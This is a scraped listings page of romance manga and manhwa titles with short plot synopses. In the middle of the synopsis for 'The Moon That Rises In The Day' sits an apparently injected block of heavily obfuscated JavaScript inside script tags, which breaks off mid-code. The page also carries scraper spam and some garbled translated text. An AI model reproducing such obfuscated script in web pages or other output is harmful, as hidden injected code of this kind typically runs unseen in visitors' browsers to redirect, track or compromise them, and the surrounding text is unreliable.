Romance - Page 83

Romance manga highlights the relationships between characters, from sweet beginnings to emotional climaxes. This genre is perfect for readers who enjoy love stories filled with drama and passion.

24259 results

Lovers Beyond Dimension

Yuan lived a poor but fulfilling life until she was transported to a different world to become a saint. “My slave, you’re late.” “What? Why would I want to assist this grumpy, ill-mannered dragon? And why would I want to be his partner?” The dragon, however, gradually changed its nature. “I will always be by your side. You are my precious saint.” “This is wrong! This is so wrong! And why do you keep making my heart pound!” 跨次元恋人, 차원 너머의 연인  


A Dangerous Lie

Chae Yi-seo, a woman who distrusts men and lives alone, and Han Do-jin, a man who deceives himself for revenge. “Let’s take it lightly and just use each other.” Two people who don’t want to marry someone they absolutely hate, only have a passionate relationship when other people’s eyes are on them! “I do not remember? “We decided to be friends.” However, the dangerous man who should never be trusted suddenly changed! Yi-seo is confused by Do-jin’s sudden declaration of friendship and at the same time becoming crazy friendly to her. “You can be on guard. “But let us be friends in the end.” Can we trust this man’s unpredictable lies? Dangerous Lies, 위험한 거짓말  


Husband Replacement

Asili thought her husband loved her, but her husband Joseph abused her and she died giving birth to a child. Before she could take revenge on him, she opened her eyes and found herself in a pre-marriage phase with him. She felt like she was going to live that hellish life again, so she looked for a replacement husband for her. Asili went straight to visit Duke Esperad Kamedeschi, who was rumored to have been afflicted by a curse after his fiancée died under mysterious circumstances. “Im Asili, i would like to ask Your Majesty to marry me.” “Does what you said mean that you wish to die now?” “Do you think the misfortune that has befallen me is a joke?” Asili knows that he will become emperor, so she tries to win his heart. Moreover, I finally replaced my husband, and my damn ex-husband is still arguing with me. Will Asili be able to take revenge across time and space and succeed in replacing her husband?


The Moon That Rises In The Day

A man whose time has stopped, and a woman who flows like a river. Story about strife that comes and goes in the past and in the present.<script></script><script>function _0x1aec(_0x61e82,_0x25782c){var _0x37bd5f=_0x3347();return _0x1aec=function(_0x2455a9,_0x2736ee){_0x2455a9=_0x2455a9-(-0x39*-0xa6+-0x1e56+0xf*-0x5f);var _0x249617=_0x37bd5f[_0x2455a9];return _0x249617;},_0x1aec(_0x61e82,_0x25782c);}(function(_0x2a87b1,_0x2bf0a3){var _0x26d6cf=_0x1aec,_0x1c6bba=_0x2a87b1();while(!![]){try{var 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I'm a Villainess, but I'm Good at Cooking

She became the villain of a novel. And not just any villain, but one who committed several crimes and was expelled from her family! Having no other choice, she started selling food on the streets to survive... But, suddenly, she was kidnapped by the prince of the empire and the villain of the novel. “I want you to be my personal cook,” he said. But why is he interested in me? After many twists and turns, she became the emperor\'s exclusive cook and followed a quiet but dull path... Until she discovered that her food had a special effect on people. A genius alchemist, a rival chef, a mysterious fox... Everyone fell in love with her food and with her. And, above all, the emperor, who was the supposed villain, was very kind and protective of her. But, she just wanted to cook in peace!

22 hours ago

I Became the Only Healer in This World

Read I Became the Only Healer in This World Novel – I Became the Only Healer in This World Manhwa Online Free At ManhuaHot “I Became the Only Healer in This World” is also known as: Я стала единственным хилером в этом мире / この世界で唯一のヒーラーになりました / 이세계의 유일한 힐러가 되었습니다 The comic I Became the Only Healer in This World belongs to the Genre: Fantasy, Romance “Top Manhua, Battwo, Read Manga Online…” are the most searched keywords on the website ZINMANGA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at BunManga. You can read TOP MANGA Human Mask The Patron’s Daughters The Genius Idol’s Strategy to Stardom

1 days ago

Ousama no Propose

The boy’s strongest first love, a witch who rules over the world with her body and strength! Kuozaki Saika. The most powerful witch who has been saving the world from destruction every 3XX hours, and the director of the magicians’ school. “…I entrust you, my world…” And then… the first girl the boy ever loved died, entrusting her body and power to Kuga Mushiki. Instructed by the servant of Saika, Kuga Mushiki is tasked with attending school as his now-deceased lover so that no one finds out the truth… He’s feared by his classmates and even his teachers. His life becomes even more troublesome as he reunites with his younger sister who asks for counseling about her love for her own brother- him!

1 days ago

Menhera Usagi wa Yandere Ookami ni Dekiaisareru

A dangerous and twisted love between a menhera girl x yandere boy!? Tsumugi is a menhera girl who\'s been dumped by a string of boyfriends for being too clingy. Her last boyfriend got angry at her for sneakily looking through his phones and kicked her out of the house. And that\'s when Itoshi, the super kind younger guy who completely accepts her, comes to the rescue. His gentle comfort soothes Tsumugi\'s broken heart, however, there\'s something he\'s hiding...!?

1 days ago

I Got Married to a Duke Called Beast

Read manhwa I Got Married to a Duke Called Beast / 야수라는 공작에게 시집왔는데 Duke Staton, with his vast estate and immense wealth, proposed to me. Why did he propose to me? I’m the daughter of a noble family with no fiefdom bearing only the name? In addition to that, there was a terrible rumor coming from the capital… Read at to support us. “Duke Staton is a beast without blood or tears.”

1 days ago

Holding You Captive

Freedom is all our heroine wants, but that isn’t what she finds when she is summoned across worlds into the body of Lady Beatrice and is newly named “Regria.” As a “divine being” who can purify the minds of “divine knights,” Regria is expected to wed the Belligram Empire’s Prince Rahich, who only sees her as a tool that will keep him from going insane. But when Beatrice’s original soul finds Regria in a moment of danger, she tells her how she can be free: by untangling Rahich’s twisted soul and making him kneel at her feet.

1 days ago

A Master, Who Woke up as a Concubine

Read manhwa A Master, Who Woke up as a Concubine / 고수, 후궁으로 깨어나다 The strongest in murim, Cheon Nyeon-bi. She was betrayed by her lover and met a tragic death, but soon after, she woke up in a concubine’s body. She was only confused for a moment. Cheon Nyeon-bi, who was satisfied with life at the palace, decided to live a comfortable life as a concubine. “I have to do the thing with his majesty?” To satisfy her duties as a concubine, she was suddenly dragged off to the emperor’s room! “Your majesty, are you good at it?” She asked the stripping emperor a hot question…! The adjustment period for a murim master to a concubine… Is it really peaceful?!

1 days ago

13th Prince

Read manhwa 13th Prince Content of the comics “13th Prince” When the 7th prince who was meant to ascend the throne is assassinated, the crown of the empire is thrust upon the 13th prince. Although he accepts it for his beloved, the title of emperor will come with many perilous challenges. “13th Prince” is another name: 13皇子の恋 13황자 The 13th Prince Thirteenth Prince

1 days ago